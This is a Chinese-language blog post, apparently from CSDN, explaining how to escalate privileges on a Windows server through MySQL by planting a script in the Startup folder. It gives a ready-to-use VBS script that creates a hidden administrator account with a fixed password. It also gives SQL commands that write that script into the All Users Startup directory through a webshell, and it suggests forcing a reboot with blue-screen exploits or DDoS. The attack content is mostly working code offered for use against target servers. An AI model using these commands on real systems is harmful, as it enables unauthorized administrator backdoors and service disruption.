Mysql 开机启动项提权

最新推荐文章于 2024-10-12 11:18:57 发布
最新推荐文章于 2024-10-12 11:18:57 发布
阅读量542 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/117675948
版权
本文介绍了如何利用Mysql在Windows系统中创建后门,通过VBS脚本提权,并详细讲解了两种提权方法:一是直接写入启动目录,二是通过MySQL执行VBS脚本。此外,还提及了重启服务器的方法以及权限需求和注意事项。
摘要由CSDN通过智能技术生成

提权原理

利用Mysql,将后门文件写入开机自启动项,同时因为是开机自启动,再写入之后,需要重启目标服务器(这个要求mysql的权限就很高,至少是管理员权限,甚至是system),该实验只能在windows中使用。

提权方式

第一种:如果" C:\Documents and Settings\All Users\「开始」菜单\程序\启动 "目录存在可读写的权限,那么我们可以直接将VBS提权脚本上传到该目录下!

setwsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","secist")
od.SetPassword "secist.com"
od.SetInfo
Set of=GetObject(os&"/secist",user)
oe.add os&"/secist"

将以上代码保存为 .vbs 后缀的文件上传即可!

第二种方式:通过大马的MySQL执行功能,利用SQL命令来进行VBS脚本的创建及添加

create table secist(cmd text);
insert into secist values("set wshshell=createobject(""wscript.shell"")");
insert into secist values("a=wshshell.run(""cmd.exe /c net user secist secist.com /add"",0)");
insert into secist values("b=wshshell.run(""cmd.exe /c net localgroup administrators secist /add"",0)");
select * from secist into dumpfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\secist.vbs";

成功执行以上命令后,只要管理员重启了服务器,我们就可以成功提权了!

相关补充

1、关于重启目标服务器,我们可以利用一些可导致服务器蓝屏的EXP,或者DDoS拒绝服务~

2、上传的目录必须具备可读写的权限

3、调用的 cmd 也必须有足够的权限

 

 

FLy_鹏程万里
关注
专栏目录
Mysql数据库提权开机启动项提权
cxrpty的博客
03-11 476
实验环境:windows2008、物理机 实验原理:利用Mysql,将后门写入开机启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限,甚至是system),该实验只能在windows中使用 实验步骤: 一、利用中国菜刀连接win2008,并连接数据库 二、在数据库命令行写入命令: select "net user cxr...
渗透测试之提权 (udf提权+mof提权+启动项提权
LKmnbZ's Blog
11-07 5762
1. 提权 低权限给高权限去提取(你已经获得一定的权限) Windows 一般用户 系统用户 管理员 system Linux 普通用户 系统用户 root 2. udf提权 1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete 权限以创建和抛弃函...
MySQL启动项提权
weixin_30293135的博客
03-24 90
关于MySQL启动项提权,听其名知其意。就是将一段 VBS脚本导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令! 这里有两种思路: 1. 如果 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在...
mysql
mnwl12_0的博客
10-09 1105
事先经过编译并存储在数据库中的一段 SQL语句的集合,调用存储过程可以简化应用开发人员的很多工作,减少数据在数据库和应用服务器之间的传输,对于提高数据处理的效率是有好处的。对视图进行增删改本质上就是对基表的修改,视图并不存储数据,当使用WITH CHECK OPTION子句创建视图时,MySQL会通过视图检查正在更改的每个行,例如 插入,更新,删除,以使其符合视图的定义。第二层架构主要完成大多数的核心服务功能,如SQL接口,并完成缓存的查询,SQL的分析和优化,部分内置函数的执行。
Day4——提权学习之MySQL数据库(启动项提权
0nc3的博客
12-17 235
0x00 原理 重启服务器会自动调用导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动下的VBS脚本,并执行其中的用户添加及提权命令。 0x01 利用条件 两种情况下均可用启动项提权 1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录可读写 直接将 VBS 提权脚本上传到该目录下 2、以...
内网渗透之——mysql数据库提权之——开机启动项提权
wsnbbz的博客
03-11 824
前提:只能在windows使用 原理 利用mysql,将后门写入开机启动项,因为是开机自启动,在写入之后,需要重启目标服务器才能生效(要求mysql的权限要很高,至少是管理员权限甚至需要system权限) 开机启动程序上传路径 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startu...
mysql漏洞利用与提权
willow_liang的博客
04-22 2727
目录 一 、Mysql信息收集 1.使用Nmap进行mysql的信息收集 2.通过msf探测mysql信息 3.使用sqlmap进行sql注入收集mysql版本信息 二、获取mysql密码 1.使用msf模块爆破 2.nmap脚本进行爆破 3.sqlmap的sql-shell查询哈希值 4.从网站泄露的源代码中查找配置文件获取用户名密码 三、通过Mysql向服务器写shell 1.利用联合注入写入shell 2.当sql注入为盲注或者报错注入时,可以使用分隔符写入shell 3.当
数据库提权
weixin_71169068的博客
04-16 962
利用此方法第一步先判断版本和安装路径:1.mysql5.1 则 导出dll文件到安装目录 /lib/plugin(这个目录默认是没有的,需要我们去创建)查看版本:mysql=>5.1跳转到安装目录发现lib目录下没有plugin,这里需要我们新建目录点击mysql提权,设置好路径,安装DLL执行命令,从而提权
mysql启动项,mysql启动项写入提权 -电脑资料
weixin_31021619的博客
03-23 119
if (get_magic_quotes_gpc()){function stripslashes_deep($value){$value = is_array($value)?array_map('stripslashes_deep',$value):stripslashes($value);return $value;}$_POST = array_map('stripslashes_...
提权mysql提权--udf、mof、启动项
yang1234567898的博客
01-05 1208
1、udf提权 当获取到mysql的root权限,需要进行权限提升,可以尝试使用udf提权 首先需要查看mysql是否有导入导出功能,如果secure_file_priv为null,则无法使用udf提权,如果value值为空,则可以继续尝试 show variables like 'secure_file_priv'; secure_file_priv的value为null ,不允许导入导出 secure_file_priv的value为/dir/,只允许dir目录下导入导.
mysql数据库程序 启动项_Day4——提权学习之MySQL数据库(启动项提权
weixin_39801356的博客
01-19 120
0x00 原理重启服务器会自动调用导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动下的VBS脚本,并执行其中的用户添加及提权命令。0x01 利用条件两种情况下均可用启动项提权1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录可读写直接将 VBS 提权脚本上传到该目录下2、以root账号...
mysql数据库提权
m0_63197559的博客
04-10 1312
MySQL数据库提权学习总结
启动项提权
yumengzth的博客
07-23 1783
0x00开机启动项提权 windows开机时候都会有一些开机启动的程序,那时候启动的程序权限都是system,因为是system把他们启动的,利用这点,我们可以将自动化脚本写入启动项,达到提权的目的。 0x01 关于自动化脚本 自动化脚本可以是bat文件,vbs文件等。 我们在拿到一个网站的webshell的时候如果想进一步的获得网站的服务器权限,查看服务器上系统盘的可读可写目录,若是启动目录 “...
数据库之Mysql提权
白帽黑客鹏哥的博客
05-29 1539
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
mysql 一键安装 bat_MySql数据库Root用户提权
weixin_39852688的博客
11-21 191
(也可适用于WEBSHELL提权,此方法已被改进,不会弹黑CMD窗口.过段时间放出!)1、连接到mysql 服务器mysql -u root -h 192.168.0.1mysql.exe 这个程序在你安装了mysql的的bin目录中   2、让我们来看看服务器中有些什么数据库mysql>show databases;mysql默认安装时会有mysql、test这两个数据库,如果你看到有其它...
提权-MySQL数据库提权
acepanhuan的博客
02-28 1988
提权-MySQL数据库提权
MySQL提权
最新发布
weixin_45626840的博客
10-12 46
渗透过程中,拿下一台低权限的主机shell(尤其是windows)时,有些操作无法进行,而此时本地恰好存在mysql数据库,且mysql是root权限 (windows中mysql一般都是管理员权限),就可以通过新建管理员用户等操作实现提权即udf提权,也可以称为通过mysql获得管理员权限。MySQL启动项提权,原理就是通过mysql把一段bat或vbs脚本导入到系统的启动项文件夹中,如果管理员启动或者重启的服务器,那么该脚本就会被调用,并执行脚本里面的命令(创建管理员账户),实现权限提升。
MYSQL提权
weixin_46626159的博客
03-19 5254
MYSQL udf 提权 一.获取网站权限 1.本地搭建pikachu靶场测试,文件上传漏洞获取webshell (1)简单的前端检测文件类型 (2)直接审查前端源代码,给它删了 (3)上传php后门代码 (4)冰蝎连接后门获取webshell 二.UDF提权 1.UDF提权知识点: (1)读取网站数据库配置文件(了解其命名规则及查找技巧) sql data inc config conn database common include等 (2)读取数据库存储或备.
mysql提权
weixin_34184158的博客
02-14 834
mysql提权原理就是让mysql能够执行系统命令, 而对与mysql提权主要分为两种:MOF提权和UDF提权 第一种: 参考文献: https://www.cnblogs.com/zhuyp1015/p/3561470.html https://www.cnblogs.com/mmx8861/p/9062363.html https:/...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值